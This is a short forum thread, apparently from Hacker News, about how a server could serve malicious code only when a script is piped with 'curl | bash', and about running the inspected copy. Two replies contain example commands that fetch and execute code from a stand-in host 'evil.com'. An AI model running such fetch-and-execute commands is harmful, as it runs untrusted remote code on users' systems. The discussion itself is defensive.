zlacker
[parent]
[thread]
6 comments
1. ericpa+(OP)
[view]
[source]
2018-07-29 04:20:02
This logic would be detectable to a user who reads the script. The goal here is to trick users who first inspect the script and then `curl | bash`
replies(1):
>>nerdpo+p
◧
2. nerdpo+p
[view]
[source]
2018-07-29 04:27:27
>>ericpa+(OP)
If you downloaded the script to inspect it, why would you not just run the script that you downloaded?
replies(4):
>>jchw+y
>>chmod7+V5
>>tutfbh+Qb
>>IshKeb+9c
◧◩
3. jchw+y
[view]
[source]
[discussion]
2018-07-29 04:30:49
>>nerdpo+p
Web browser.
◧◩
4. chmod7+V5
[view]
[source]
[discussion]
2018-07-29 06:44:54
>>nerdpo+p
curl evil.com curl evil.com | bash
replies(1):
>>nerdpo+jp
◧◩
5. tutfbh+Qb
[view]
[source]
[discussion]
2018-07-29 09:22:40
>>nerdpo+p
That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.
◧◩
6. IshKeb+9c
[view]
[source]
[discussion]
2018-07-29 09:28:04
>>nerdpo+p
There's more than one user. You don't want any of them to find the malicious code.
◧◩◪
7. nerdpo+jp
[view]
[source]
[discussion]
2018-07-29 13:38:40
>>chmod7+V5
wget evil.com less evil.sh bash evil.sh
[go to top]